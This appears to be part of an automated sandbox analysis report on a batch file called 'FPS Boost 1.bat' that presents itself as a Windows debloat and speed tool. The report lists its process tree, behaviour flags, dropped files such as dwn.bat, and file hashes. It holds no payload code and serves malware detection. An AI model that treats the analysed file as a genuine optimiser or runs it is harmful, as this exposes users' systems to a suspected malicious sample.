                                                                                                                                                                                                PID:936
                                                                                                                                                                                              • C:\Windows\System32\findstr.exe
                                                                                                                                                                                                findstr /v /a:8 /R "^$" " [ " nul
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:3268
                                                                                                                                                                                                • C:\Windows\System32\findstr.exe
                                                                                                                                                                                                  findstr /v /a:B /R "^$" " 3 " nul
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:3476
                                                                                                                                                                                                  • C:\Windows\System32\findstr.exe
                                                                                                                                                                                                    findstr /v /a:B /R "^$" " 7 " nul
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:2576
                                                                                                                                                                                                    • C:\Windows\System32\findstr.exe
                                                                                                                                                                                                      findstr /v /a:8 /R "^$" " ] " nul
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:400
                                                                                                                                                                                                      • C:\Windows\System32\findstr.exe
                                                                                                                                                                                                        findstr /v /a:F /R "^$" " Debloat " nul
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:1720
                                                                                                                                                                                                        • C:\Windows\System32\findstr.exe
                                                                                                                                                                                                          findstr /v /a:8 /R "^$" " [ X to go Back ]" nul
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:1604
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                          PID:3488
                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                          explorer.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Boot or Logon Autostart Execution: Active Setup
                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                          PID:1464
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                          PID:1248
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                          PID:4796
                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                          explorer.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Boot or Logon Autostart Execution: Active Setup
                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                          PID:4416
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                          PID:3660
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                          PID:4700
                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                          explorer.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Boot or Logon Autostart Execution: Active Setup
                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          PID:2772
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                          PID:4392
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                          PID:2468
                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                          explorer.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Boot or Logon Autostart Execution: Active Setup
                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                          PID:4436
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                          PID:3368
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                          PID:2648
                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                          explorer.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Boot or Logon Autostart Execution: Active Setup
                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          PID:508
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                          PID:2880
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                          PID:3792
                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                          explorer.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Boot or Logon Autostart Execution: Active Setup
                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                          PID:4132
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:4332
                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:4672
                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                              explorer.exe
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:4512
                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:3148
                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:1948
                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                    explorer.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:3608
                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:3792
                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:976
                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                          explorer.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:536
                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:2680
                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:3132
                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                explorer.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:1604
                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:4184
                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:984
                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                      explorer.exe
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:2988
                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:3820
                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:3700
                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                            explorer.exe
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:4280
                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:3436
                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:4468
                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  explorer.exe
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:2712
                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:4192
                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:1736
                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                        explorer.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:5104
                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:3944
                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:1784
                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                              explorer.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:4080
                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:548
                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:4976
                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                    explorer.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:2072
                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:424

                                                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        3KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        56c43715e0e7fa58012d8a5769d8d568

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        4370ca3436f2e3a95b47a728503a2c22a5a5fa39

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        8ef51b68725d9ddcda70f9f7ef24686ff3cb4a00f7d2dce79d10027ed63dfed5

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        b8da8defb2080d04babc3e676cc9686c7f71b15eeca0e738ca75c9fb7af968eba8d3daff5bc2e31d471e26568df2f319ec1f4b00bf43ffb60460e5df787947ed

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        cf70f70f9c094c99b5d7b8a1fabd9513

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        6ea5b0d7a9c431d27b6c8c313ddf1289313f64cd

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        0476b6e80795f5d3cb917f6315469a157fca6318eaa7618453bce0f670157fde

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        dadbf08b99245a9aa10f2bf98beb95248823dc8838cf76eb0628a011437ba5625f766c86cd0cbcb2f22ddc7cced3cae933e7202cb359a2b140790d4a0b6a8f6c

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\M6JCG2RK\microsoft.windows[1].xml

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        96B

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        732a32ad072ef786d816a4f85b1b6bea

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        fe1945717c160ac3266f291564a003c044d409b0

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        7dd2262373fcd6ebe2ed2c6e66242c85b1434c3fe23ca92ba41ae328ce8b941e

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        55b57d5bf942f20a3557f20adeebb4c01cde4aec9d7a4fa8bfe6281fe0981773d8ce637fdbd1dc64f25abe72d75fad2a6538fadc86483ede9fdc5b59c0d36b79

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133740748476027766.txt

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        75KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        703801b739b4e74d5e5ecd811d0a9dd7

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        35b8d5817b208942a0fe30603cadf0f35ce3f0e8

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        b7876635cc3e3898e9594a5d6be9fd1125c212ac4392ee9b7789473e48be33bd

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        a7619e7a827103488b6f3fa80b2162d1fb93ad5d9c13db8d18857c149ed34dbc3c7e69497c9514fe6b4c2b3a702ff1b1ed09978ddadb500b6131d8d61c4835f8

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_edk1szmo.p4w.ps1

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        60B

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\FPS Boost 1.bat

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        55KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        76f94fe08cc7b659f2d6b8e475a74baa

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        6bee16deff8a87e3f02d4b11380da60bf976a240

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        fd5967c4267c8fde06482595aff50653e801cd0cb0110a5799fa0d2c7bb0f0b1

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        1ce7656aa64d2e1809a8fb1ea2b9ffb03213b63b99330ec5a1ccd792ceae85f7d52a42e4ca1aadad45ba4a01e10a12a03b162936838fc2a57bc079211e92bb54

                                                                                                                                                                                                                                                                      • C:\Users\Public\dwn.bat

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        634B

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        cf04779e43afe21e2420e4fc4641c551

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        59143b29ad70180bbd90daaf12f9309eb4625fc4

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        f03f052041664c4359f61f7acc64705d15d821f445af92cd74d8ddf8056f1701

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        4c712fe8ec9bbad7c34848aa46c44de62c9974f1a89fb27922868392a656c389a33e7ba63418e128524969f9c96e1ea7c39b24e77f53799d67c0b6b86df94dcb

                                                                                                                                                                                                                                                                      • C:\Windows\System32\ ]

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        3B

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        df66fa563a2fafdb93cc559deb0a38c4

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        e6666cf8574b0f7a9ae5bccee572f965c2aec9cb

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        3e39ed22dc63246937c4dbbf34ce4fb1cfe6b00de7596b020cad49ae50031351

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        34ea05ee75cd840a94526411777868edb293a69867e1fdc2c2e917d278a3d58fcb86afc65142f4b184ce6907f04fb254a86061cfb620f01874b0b454a6f01c18

                                                                                                                                                                                                                                                                      • memory/508-993-0x00000000043A0000-0x00000000043A1000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                      • memory/536-1561-0x0000000004B40000-0x0000000004B41000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                      • memory/976-1443-0x000001F3963E0000-0x000001F396400000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                                                                      • memory/976-1457-0x000001F3969F0000-0x000001F396A10000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                                                                      • memory/976-1426-0x000001F396620000-0x000001F396640000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                                                                      • memory/976-1422-0x000001F395500000-0x000001F395600000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1024KB

                                                                                                                                                                                                                                                                      • memory/976-1421-0x000001F395500000-0x000001F395600000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1024KB

